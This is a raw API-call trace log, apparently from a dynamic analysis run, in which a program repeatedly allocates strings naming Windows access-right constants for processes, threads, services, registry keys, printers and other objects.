[0120.519] SysReAllocStringLen (in: pbstr=0x2ade860*=0x0, psz="MUTEX_ALL_ACCESS", len=0x10 | out: pbstr=0x2ade860*="MUTEX_ALL_ACCESS") returned 1
[0120.519] SysReAllocStringLen (in: pbstr=0x2ade850*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x2ade850*="STANDARD_RIGHTS_EXECUTE") returned 1
[0120.519] SysReAllocStringLen (in: pbstr=0x2ade840*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x2ade840*="STANDARD_RIGHTS_WRITE") returned 1
[0120.519] SysReAllocStringLen (in: pbstr=0x2ade830*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x2ade830*="STANDARD_RIGHTS_READ") returned 1
[0120.519] SysReAllocStringLen (in: pbstr=0x2ade820*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x2ade820*="STANDARD_RIGHTS_ALL") returned 1
[0120.519] SysReAllocStringLen (in: pbstr=0x2ade810*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2ade810*="DELETE") returned 1
[0120.519] SysReAllocStringLen (in: pbstr=0x2ade800*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2ade800*="READ_CONTROL") returned 1
[0120.519] SysReAllocStringLen (in: pbstr=0x2ade7f0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2ade7f0*="WRITE_OWNER") returned 1
[0120.519] SysReAllocStringLen (in: pbstr=0x2ade7e0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2ade7e0*="WRITE_DAC") returned 1
[0120.519] SysReAllocStringLen (in: pbstr=0x2ade7d0*=0x0, psz="EVENT_MODIFY_STATE", len=0x12 | out: pbstr=0x2ade7d0*="EVENT_MODIFY_STATE") returned 1
[0120.520] SysReAllocStringLen (in: pbstr=0x2ade7c0*=0x0, psz="EVENT_ALL_ACCESS", len=0x10 | out: pbstr=0x2ade7c0*="EVENT_ALL_ACCESS") returned 1
[0120.520] SysReAllocStringLen (in: pbstr=0x2ade7b0*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x2ade7b0*="STANDARD_RIGHTS_EXECUTE") returned 1
[0120.520] SysReAllocStringLen (in: pbstr=0x2ade7a0*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x2ade7a0*="STANDARD_RIGHTS_WRITE") returned 1
[0120.520] SysReAllocStringLen (in: pbstr=0x2ade790*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x2ade790*="STANDARD_RIGHTS_READ") returned 1
[0120.520] SysReAllocStringLen (in: pbstr=0x2ade780*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x2ade780*="STANDARD_RIGHTS_ALL") returned 1
[0120.520] SysReAllocStringLen (in: pbstr=0x2ade770*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2ade770*="DELETE") returned 1
[0120.520] SysReAllocStringLen (in: pbstr=0x2ade760*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2ade760*="READ_CONTROL") returned 1
[0120.520] SysReAllocStringLen (in: pbstr=0x2ade750*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2ade750*="WRITE_OWNER") returned 1
[0120.520] SysReAllocStringLen (in: pbstr=0x2ade740*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2ade740*="WRITE_DAC") returned 1
[0120.520] SysReAllocStringLen (in: pbstr=0x2ade730*=0x0, psz="SEMAPHORE_MODIFY_STATE", len=0x16 | out: pbstr=0x2ade730*="SEMAPHORE_MODIFY_STATE") returned 1
[0120.520] SysReAllocStringLen (in: pbstr=0x2ade720*=0x0, psz="SEMAPHORE_ALL_ACCESS", len=0x14 | out: pbstr=0x2ade720*="SEMAPHORE_ALL_ACCESS") returned 1
[0120.520] SysReAllocStringLen (in: pbstr=0x2ade710*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x2ade710*="STANDARD_RIGHTS_EXECUTE") returned 1
[0120.520] SysReAllocStringLen (in: pbstr=0x2ade700*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x2ade700*="STANDARD_RIGHTS_WRITE") returned 1
[0120.520] SysReAllocStringLen (in: pbstr=0x2ade6f0*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x2ade6f0*="STANDARD_RIGHTS_READ") returned 1
[0120.520] SysReAllocStringLen (in: pbstr=0x2ade6e0*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x2ade6e0*="STANDARD_RIGHTS_ALL") returned 1
[0120.520] SysReAllocStringLen (in: pbstr=0x2ade6d0*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2ade6d0*="DELETE") returned 1
[0120.520] SysReAllocStringLen (in: pbstr=0x2ade6c0*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2ade6c0*="READ_CONTROL") returned 1
[0120.520] SysReAllocStringLen (in: pbstr=0x2ade6b0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2ade6b0*="WRITE_OWNER") returned 1
[0120.520] SysReAllocStringLen (in: pbstr=0x2ade6a0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2ade6a0*="WRITE_DAC") returned 1
[0120.520] SysReAllocStringLen (in: pbstr=0x2ade690*=0x0, psz="JOB_OBJECT_SET_SECURITY_ATTRIBUTES", len=0x22 | out: pbstr=0x2ade690*="JOB_OBJECT_SET_SECURITY_ATTRIBUTES") returned 1
[0120.520] SysReAllocStringLen (in: pbstr=0x2ade680*=0x0, psz="JOB_OBJECT_TERMINATE", len=0x14 | out: pbstr=0x2ade680*="JOB_OBJECT_TERMINATE") returned 1
[0120.520] SysReAllocStringLen (in: pbstr=0x2ade670*=0x0, psz="JOB_OBJECT_QUERY", len=0x10 | out: pbstr=0x2ade670*="JOB_OBJECT_QUERY") returned 1
[0120.520] SysReAllocStringLen (in: pbstr=0x2ade660*=0x0, psz="JOB_OBJECT_SET_ATTRIBUTES", len=0x19 | out: pbstr=0x2ade660*="JOB_OBJECT_SET_ATTRIBUTES") returned 1
[0120.520] SysReAllocStringLen (in: pbstr=0x2ade650*=0x0, psz="JOB_OBJECT_ASSIGN_PROCESS", len=0x19 | out: pbstr=0x2ade650*="JOB_OBJECT_ASSIGN_PROCESS") returned 1
[0120.520] SysReAllocStringLen (in: pbstr=0x2ade640*=0x0, psz="JOB_OBJECT_ALL_ACCESS", len=0x15 | out: pbstr=0x2ade640*="JOB_OBJECT_ALL_ACCESS") returned 1
[0120.520] SysReAllocStringLen (in: pbstr=0x2ade630*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x2ade630*="STANDARD_RIGHTS_EXECUTE") returned 1
[0120.520] SysReAllocStringLen (in: pbstr=0x2ade620*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x2ade620*="STANDARD_RIGHTS_WRITE") returned 1
[0120.520] SysReAllocStringLen (in: pbstr=0x2ade610*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x2ade610*="STANDARD_RIGHTS_READ") returned 1
[0120.520] SysReAllocStringLen (in: pbstr=0x2ade600*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x2ade600*="STANDARD_RIGHTS_ALL") returned 1
[0120.520] SysReAllocStringLen (in: pbstr=0x2ade5f0*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2ade5f0*="DELETE") returned 1
[0120.520] SysReAllocStringLen (in: pbstr=0x2ade5e0*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2ade5e0*="READ_CONTROL") returned 1
[0120.520] SysReAllocStringLen (in: pbstr=0x2ade5d0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2ade5d0*="WRITE_OWNER") returned 1
[0120.520] SysReAllocStringLen (in: pbstr=0x2ade5c0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2ade5c0*="WRITE_DAC") returned 1
[0120.520] SysReAllocStringLen (in: pbstr=0x2ade5b0*=0x0, psz="THREAD_DIRECT_IMPERSONATION", len=0x1b | out: pbstr=0x2ade5b0*="THREAD_DIRECT_IMPERSONATION") returned 1
[0120.520] SysReAllocStringLen (in: pbstr=0x2ade5a0*=0x0, psz="THREAD_IMPERSONATE", len=0x12 | out: pbstr=0x2ade5a0*="THREAD_IMPERSONATE") returned 1
[0120.520] SysReAllocStringLen (in: pbstr=0x2ade590*=0x0, psz="THREAD_SET_THREAD_TOKEN", len=0x17 | out: pbstr=0x2ade590*="THREAD_SET_THREAD_TOKEN") returned 1
[0120.520] SysReAllocStringLen (in: pbstr=0x2ade580*=0x0, psz="THREAD_QUERY_INFORMATION", len=0x18 | out: pbstr=0x2ade580*="THREAD_QUERY_INFORMATION") returned 1
[0120.521] SysReAllocStringLen (in: pbstr=0x2ade570*=0x0, psz="THREAD_SET_INFORMATION", len=0x16 | out: pbstr=0x2ade570*="THREAD_SET_INFORMATION") returned 1
[0120.521] SysReAllocStringLen (in: pbstr=0x2ade560*=0x0, psz="THREAD_SET_CONTEXT", len=0x12 | out: pbstr=0x2ade560*="THREAD_SET_CONTEXT") returned 1
[0120.521] SysReAllocStringLen (in: pbstr=0x2ade550*=0x0, psz="THREAD_GET_CONTEXT", len=0x12 | out: pbstr=0x2ade550*="THREAD_GET_CONTEXT") returned 1
[0120.521] SysReAllocStringLen (in: pbstr=0x2ade540*=0x0, psz="THREAD_SUSPEND_RESUME", len=0x15 | out: pbstr=0x2ade540*="THREAD_SUSPEND_RESUME") returned 1
[0120.521] SysReAllocStringLen (in: pbstr=0x2ade530*=0x0, psz="THREAD_TERMINATE", len=0x10 | out: pbstr=0x2ade530*="THREAD_TERMINATE") returned 1
[0120.521] SysReAllocStringLen (in: pbstr=0x2ade520*=0x0, psz="THREAD_ALL_ACCESS", len=0x11 | out: pbstr=0x2ade520*="THREAD_ALL_ACCESS") returned 1
[0120.521] SysReAllocStringLen (in: pbstr=0x2ade510*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x2ade510*="STANDARD_RIGHTS_EXECUTE") returned 1
[0120.521] SysReAllocStringLen (in: pbstr=0x2ade500*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x2ade500*="STANDARD_RIGHTS_WRITE") returned 1
[0120.521] SysReAllocStringLen (in: pbstr=0x2ade4f0*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x2ade4f0*="STANDARD_RIGHTS_READ") returned 1
[0120.521] SysReAllocStringLen (in: pbstr=0x2ade4e0*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x2ade4e0*="STANDARD_RIGHTS_ALL") returned 1
[0120.521] SysReAllocStringLen (in: pbstr=0x2ade4d0*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2ade4d0*="DELETE") returned 1
[0120.521] SysReAllocStringLen (in: pbstr=0x2ade4c0*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2ade4c0*="READ_CONTROL") returned 1
[0120.521] SysReAllocStringLen (in: pbstr=0x2ade4b0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2ade4b0*="WRITE_OWNER") returned 1
[0120.521] SysReAllocStringLen (in: pbstr=0x2ade4a0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2ade4a0*="WRITE_DAC") returned 1
[0120.521] SysReAllocStringLen (in: pbstr=0x2ade490*=0x0, psz="PROCESS_QUERY_INFORMATION", len=0x19 | out: pbstr=0x2ade490*="PROCESS_QUERY_INFORMATION") returned 1
[0120.521] SysReAllocStringLen (in: pbstr=0x2ade480*=0x0, psz="PROCESS_SET_INFORMATION", len=0x17 | out: pbstr=0x2ade480*="PROCESS_SET_INFORMATION") returned 1
[0120.521] SysReAllocStringLen (in: pbstr=0x2ade470*=0x0, psz="PROCESS_SET_QUOTA", len=0x11 | out: pbstr=0x2ade470*="PROCESS_SET_QUOTA") returned 1
[0120.521] SysReAllocStringLen (in: pbstr=0x2ade460*=0x0, psz="PROCESS_CREATE_PROCESS", len=0x16 | out: pbstr=0x2ade460*="PROCESS_CREATE_PROCESS") returned 1
[0120.521] SysReAllocStringLen (in: pbstr=0x2ade450*=0x0, psz="PROCESS_DUP_HANDLE", len=0x12 | out: pbstr=0x2ade450*="PROCESS_DUP_HANDLE") returned 1
[0120.521] SysReAllocStringLen (in: pbstr=0x2ade440*=0x0, psz="PROCESS_VM_WRITE", len=0x10 | out: pbstr=0x2ade440*="PROCESS_VM_WRITE") returned 1
[0120.521] SysReAllocStringLen (in: pbstr=0x2ade430*=0x0, psz="PROCESS_VM_READ", len=0xf | out: pbstr=0x2ade430*="PROCESS_VM_READ") returned 1
[0120.521] SysReAllocStringLen (in: pbstr=0x2ade420*=0x0, psz="PROCESS_VM_OPERATION", len=0x14 | out: pbstr=0x2ade420*="PROCESS_VM_OPERATION") returned 1
[0120.521] SysReAllocStringLen (in: pbstr=0x2ade410*=0x0, psz="PROCESS_SET_SESSIONID", len=0x15 | out: pbstr=0x2ade410*="PROCESS_SET_SESSIONID") returned 1
[0120.521] SysReAllocStringLen (in: pbstr=0x2ade400*=0x0, psz="PROCESS_CREATE_THREAD", len=0x15 | out: pbstr=0x2ade400*="PROCESS_CREATE_THREAD") returned 1
[0120.521] SysReAllocStringLen (in: pbstr=0x2ade3f0*=0x0, psz="PROCESS_TERMINATE", len=0x11 | out: pbstr=0x2ade3f0*="PROCESS_TERMINATE") returned 1
[0120.521] SysReAllocStringLen (in: pbstr=0x2ade3e0*=0x0, psz="PROCESS_ALL_ACCESS", len=0x12 | out: pbstr=0x2ade3e0*="PROCESS_ALL_ACCESS") returned 1
[0120.521] SysReAllocStringLen (in: pbstr=0x2ade3d0*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x2ade3d0*="STANDARD_RIGHTS_EXECUTE") returned 1
[0120.521] SysReAllocStringLen (in: pbstr=0x2ade3c0*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x2ade3c0*="STANDARD_RIGHTS_WRITE") returned 1
[0120.521] SysReAllocStringLen (in: pbstr=0x2ade3b0*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x2ade3b0*="STANDARD_RIGHTS_READ") returned 1
[0120.521] SysReAllocStringLen (in: pbstr=0x2ade3a0*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x2ade3a0*="STANDARD_RIGHTS_ALL") returned 1
[0120.521] SysReAllocStringLen (in: pbstr=0x2ade390*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2ade390*="DELETE") returned 1
[0120.521] SysReAllocStringLen (in: pbstr=0x2ade380*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2ade380*="READ_CONTROL") returned 1
[0120.521] SysReAllocStringLen (in: pbstr=0x2ade370*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2ade370*="WRITE_OWNER") returned 1
[0120.521] SysReAllocStringLen (in: pbstr=0x2ade360*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2ade360*="WRITE_DAC") returned 1
[0120.521] SysReAllocStringLen (in: pbstr=0x2ade350*=0x0, psz="PERM_FILE_CREATE", len=0x10 | out: pbstr=0x2ade350*="PERM_FILE_CREATE") returned 1
[0120.521] SysReAllocStringLen (in: pbstr=0x2ade340*=0x0, psz="PERM_FILE_WRITE", len=0xf | out: pbstr=0x2ade340*="PERM_FILE_WRITE") returned 1
[0120.521] SysReAllocStringLen (in: pbstr=0x2ade330*=0x0, psz="PERM_FILE_READ", len=0xe | out: pbstr=0x2ade330*="PERM_FILE_READ") returned 1
[0120.522] SysReAllocStringLen (in: pbstr=0x2ade320*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x2ade320*="STANDARD_RIGHTS_EXECUTE") returned 1
[0120.522] SysReAllocStringLen (in: pbstr=0x2ade310*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x2ade310*="STANDARD_RIGHTS_WRITE") returned 1
[0120.522] SysReAllocStringLen (in: pbstr=0x2ade300*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x2ade300*="STANDARD_RIGHTS_READ") returned 1
[0120.522] SysReAllocStringLen (in: pbstr=0x2ade2f0*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x2ade2f0*="STANDARD_RIGHTS_ALL") returned 1
[0120.522] SysReAllocStringLen (in: pbstr=0x2ade2e0*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2ade2e0*="DELETE") returned 1
[0120.522] SysReAllocStringLen (in: pbstr=0x2ade2d0*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2ade2d0*="READ_CONTROL") returned 1
[0120.522] SysReAllocStringLen (in: pbstr=0x2ade2c0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2ade2c0*="WRITE_OWNER") returned 1
[0120.522] SysReAllocStringLen (in: pbstr=0x2ade2b0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2ade2b0*="WRITE_DAC") returned 1
[0120.522] SysReAllocStringLen (in: pbstr=0x2ade2a0*=0x0, psz="JOB_ACCESS_ADMINISTER", len=0x15 | out: pbstr=0x2ade2a0*="JOB_ACCESS_ADMINISTER") returned 1
[0120.522] SysReAllocStringLen (in: pbstr=0x2ade290*=0x0, psz="PRINTER_ACCESS_USE", len=0x12 | out: pbstr=0x2ade290*="PRINTER_ACCESS_USE") returned 1
[0120.522] SysReAllocStringLen (in: pbstr=0x2ade280*=0x0, psz="PRINTER_ACCESS_ADMINISTER", len=0x19 | out: pbstr=0x2ade280*="PRINTER_ACCESS_ADMINISTER") returned 1
[0120.522] SysReAllocStringLen (in: pbstr=0x2ade270*=0x0, psz="SERVER_ACCESS_ENUMERATE", len=0x17 | out: pbstr=0x2ade270*="SERVER_ACCESS_ENUMERATE") returned 1
[0120.522] SysReAllocStringLen (in: pbstr=0x2ade260*=0x0, psz="SERVER_ACCESS_ADMINISTER", len=0x18 | out: pbstr=0x2ade260*="SERVER_ACCESS_ADMINISTER") returned 1
[0120.522] SysReAllocStringLen (in: pbstr=0x2ade250*=0x0, psz="PRINTER_ALL_ACCESS", len=0x12 | out: pbstr=0x2ade250*="PRINTER_ALL_ACCESS") returned 1
[0120.522] SysReAllocStringLen (in: pbstr=0x2ade240*=0x0, psz="PRINTER_EXECUTE", len=0xf | out: pbstr=0x2ade240*="PRINTER_EXECUTE") returned 1
[0120.522] SysReAllocStringLen (in: pbstr=0x2ade230*=0x0, psz="PRINTER_WRITE", len=0xd | out: pbstr=0x2ade230*="PRINTER_WRITE") returned 1
[0120.522] SysReAllocStringLen (in: pbstr=0x2ade220*=0x0, psz="PRINTER_READ", len=0xc | out: pbstr=0x2ade220*="PRINTER_READ") returned 1
[0120.522] SysReAllocStringLen (in: pbstr=0x2ade210*=0x0, psz="PRINTER_ALL_ACCESS", len=0x12 | out: pbstr=0x2ade210*="PRINTER_ALL_ACCESS") returned 1
[0120.522] SysReAllocStringLen (in: pbstr=0x2ade200*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2ade200*="DELETE") returned 1
[0120.522] SysReAllocStringLen (in: pbstr=0x2ade1f0*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2ade1f0*="READ_CONTROL") returned 1
[0120.522] SysReAllocStringLen (in: pbstr=0x2ade1e0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2ade1e0*="WRITE_OWNER") returned 1
[0120.522] SysReAllocStringLen (in: pbstr=0x2ade1d0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2ade1d0*="WRITE_DAC") returned 1
[0120.522] SysReAllocStringLen (in: pbstr=0x2ade1c0*=0x0, psz="SC_MANAGER_QUERY_LOCK_STATUS", len=0x1c | out: pbstr=0x2ade1c0*="SC_MANAGER_QUERY_LOCK_STATUS") returned 1
[0120.522] SysReAllocStringLen (in: pbstr=0x2ade1b0*=0x0, psz="SC_MANAGER_MODIFY_BOOT_CONFIG", len=0x1d | out: pbstr=0x2ade1b0*="SC_MANAGER_MODIFY_BOOT_CONFIG") returned 1
[0120.522] SysReAllocStringLen (in: pbstr=0x2ade1a0*=0x0, psz="SC_MANAGER_LOCK", len=0xf | out: pbstr=0x2ade1a0*="SC_MANAGER_LOCK") returned 1
[0120.522] SysReAllocStringLen (in: pbstr=0x2ade190*=0x0, psz="SC_MANAGER_ENUMERATE_SERVICE", len=0x1c | out: pbstr=0x2ade190*="SC_MANAGER_ENUMERATE_SERVICE") returned 1
[0120.522] SysReAllocStringLen (in: pbstr=0x2ade180*=0x0, psz="SC_MANAGER_CONNECT", len=0x12 | out: pbstr=0x2ade180*="SC_MANAGER_CONNECT") returned 1
[0120.522] SysReAllocStringLen (in: pbstr=0x2ade170*=0x0, psz="SC_MANAGER_CREATE_SERVICE", len=0x19 | out: pbstr=0x2ade170*="SC_MANAGER_CREATE_SERVICE") returned 1
[0120.522] SysReAllocStringLen (in: pbstr=0x2ade160*=0x0, psz="SC_MANAGER_ALL_ACCESS", len=0x15 | out: pbstr=0x2ade160*="SC_MANAGER_ALL_ACCESS") returned 1
[0120.522] SysReAllocStringLen (in: pbstr=0x2ade150*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x2ade150*="STANDARD_RIGHTS_EXECUTE") returned 1
[0120.523] SysReAllocStringLen (in: pbstr=0x2ade140*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x2ade140*="STANDARD_RIGHTS_WRITE") returned 1
[0120.523] SysReAllocStringLen (in: pbstr=0x2ade130*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x2ade130*="STANDARD_RIGHTS_READ") returned 1
[0120.523] SysReAllocStringLen (in: pbstr=0x2ade120*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x2ade120*="STANDARD_RIGHTS_ALL") returned 1
[0120.523] SysReAllocStringLen (in: pbstr=0x2ade110*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2ade110*="DELETE") returned 1
[0120.523] SysReAllocStringLen (in: pbstr=0x2ade100*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2ade100*="READ_CONTROL") returned 1
[0120.523] SysReAllocStringLen (in: pbstr=0x2ade0f0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2ade0f0*="WRITE_OWNER") returned 1
[0120.523] SysReAllocStringLen (in: pbstr=0x2ade0e0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2ade0e0*="WRITE_DAC") returned 1
[0120.523] SysReAllocStringLen (in: pbstr=0x2ade0d0*=0x0, psz="SERVICE_USER_DEFINED_CONTROL", len=0x1c | out: pbstr=0x2ade0d0*="SERVICE_USER_DEFINED_CONTROL") returned 1
[0120.523] SysReAllocStringLen (in: pbstr=0x2ade0c0*=0x0, psz="SERVICE_STOP", len=0xc | out: pbstr=0x2ade0c0*="SERVICE_STOP") returned 1
[0120.523] SysReAllocStringLen (in: pbstr=0x2ade0b0*=0x0, psz="SERVICE_START", len=0xd | out: pbstr=0x2ade0b0*="SERVICE_START") returned 1
[0120.523] SysReAllocStringLen (in: pbstr=0x2ade0a0*=0x0, psz="SERVICE_QUERY_STATUS", len=0x14 | out: pbstr=0x2ade0a0*="SERVICE_QUERY_STATUS") returned 1
[0120.523] SysReAllocStringLen (in: pbstr=0x2ade090*=0x0, psz="SERVICE_QUERY_CONFIG", len=0x14 | out: pbstr=0x2ade090*="SERVICE_QUERY_CONFIG") returned 1
[0120.523] SysReAllocStringLen (in: pbstr=0x2ade080*=0x0, psz="SERVICE_PAUSE_CONTINUE", len=0x16 | out: pbstr=0x2ade080*="SERVICE_PAUSE_CONTINUE") returned 1
[0120.523] SysReAllocStringLen (in: pbstr=0x2ade070*=0x0, psz="SERVICE_INTERROGATE", len=0x13 | out: pbstr=0x2ade070*="SERVICE_INTERROGATE") returned 1
[0120.523] SysReAllocStringLen (in: pbstr=0x2ade060*=0x0, psz="SERVICE_ENUMERATE_DEPENDENTS", len=0x1c | out: pbstr=0x2ade060*="SERVICE_ENUMERATE_DEPENDENTS") returned 1
[0120.523] SysReAllocStringLen (in: pbstr=0x2ade050*=0x0, psz="SERVICE_CHANGE_CONFIG", len=0x15 | out: pbstr=0x2ade050*="SERVICE_CHANGE_CONFIG") returned 1
[0120.523] SysReAllocStringLen (in: pbstr=0x2ade040*=0x0, psz="SERVICE_ALL_ACCESS", len=0x12 | out: pbstr=0x2ade040*="SERVICE_ALL_ACCESS") returned 1
[0120.523] SysReAllocStringLen (in: pbstr=0x2ade030*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x2ade030*="STANDARD_RIGHTS_EXECUTE") returned 1
[0120.523] SysReAllocStringLen (in: pbstr=0x2ade020*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x2ade020*="STANDARD_RIGHTS_WRITE") returned 1
[0120.523] SysReAllocStringLen (in: pbstr=0x2ade010*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x2ade010*="STANDARD_RIGHTS_READ") returned 1
[0120.523] SysReAllocStringLen (in: pbstr=0x2ade000*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x2ade000*="STANDARD_RIGHTS_ALL") returned 1
[0120.523] SysReAllocStringLen (in: pbstr=0x2addff0*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2addff0*="DELETE") returned 1
[0120.523] SysReAllocStringLen (in: pbstr=0x2addfe0*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2addfe0*="READ_CONTROL") returned 1
[0120.523] SysReAllocStringLen (in: pbstr=0x2addfd0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2addfd0*="WRITE_OWNER") returned 1
[0120.523] SysReAllocStringLen (in: pbstr=0x2addfc0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2addfc0*="WRITE_DAC") returned 1
[0120.523] SysReAllocStringLen (in: pbstr=0x2addfb0*=0x0, psz="KEY_SET_VALUE", len=0xd | out: pbstr=0x2addfb0*="KEY_SET_VALUE") returned 1
[0120.523] SysReAllocStringLen (in: pbstr=0x2addfa0*=0x0, psz="KEY_CREATE_LINK", len=0xf | out: pbstr=0x2addfa0*="KEY_CREATE_LINK") returned 1
[0120.523] SysReAllocStringLen (in: pbstr=0x2addf90*=0x0, psz="KEY_CREATE_SUB_KEY", len=0x12 | out: pbstr=0x2addf90*="KEY_CREATE_SUB_KEY") returned 1
[0120.523] SysReAllocStringLen (in: pbstr=0x2addf80*=0x0, psz="KEY_NOTIFY", len=0xa | out: pbstr=0x2addf80*="KEY_NOTIFY") returned 1
[0120.523] SysReAllocStringLen (in: pbstr=0x2addf70*=0x0, psz="KEY_ENUMERATE_SUB_KEYS", len=0x16 | out: pbstr=0x2addf70*="KEY_ENUMERATE_SUB_KEYS") returned 1
[0120.523] SysReAllocStringLen (in: pbstr=0x2addf60*=0x0, psz="KEY_QUERY_VALUE", len=0xf | out: pbstr=0x2addf60*="KEY_QUERY_VALUE") returned 1
[0120.524] SysReAllocStringLen (in: pbstr=0x2addf50*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x2addf50*="STANDARD_RIGHTS_EXECUTE") returned 1
[0120.524] SysReAllocStringLen (in: pbstr=0x2addf40*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x2addf40*="STANDARD_RIGHTS_WRITE") returned 1
[0120.524] SysReAllocStringLen (in: pbstr=0x2addf30*=0x0, psz="STANDARD_RIGHTS_READ 2", len=0x16 | out: pbstr=0x2addf30*="STANDARD_RIGHTS_READ 2") returned 1
[0120.524] SysReAllocStringLen (in: pbstr=0x2addf20*=0x0, psz="STANDARD_RIGHTS_ALL 1", len=0x15 | out: pbstr=0x2addf20*="STANDARD_RIGHTS_ALL 1") returned 1
[0120.524] SysReAllocStringLen (in: pbstr=0x2addf10*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2addf10*="DELETE") returned 1
[0120.524] SysReAllocStringLen (in: pbstr=0x2addf00*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2addf00*="READ_CONTROL") returned 1
[0120.524] SysReAllocStringLen (in: pbstr=0x2addef0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2addef0*="WRITE_OWNER") returned 1
[0120.524] SysReAllocStringLen (in: pbstr=0x2addee0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2addee0*="WRITE_DAC") returned 1
[0120.524] SysReAllocStringLen (in: pbstr=0x2added0*=0x0, psz="DESKTOP_SWITCHDESKTOP", len=0x15 | out: pbstr=0x2added0*="DESKTOP_SWITCHDESKTOP") returned 1
[0120.524] SysReAllocStringLen (in: pbstr=0x2addec0*=0x0, psz="DESKTOP_WRITEOBJECTS", len=0x14 | out: pbstr=0x2addec0*="DESKTOP_WRITEOBJECTS") returned 1
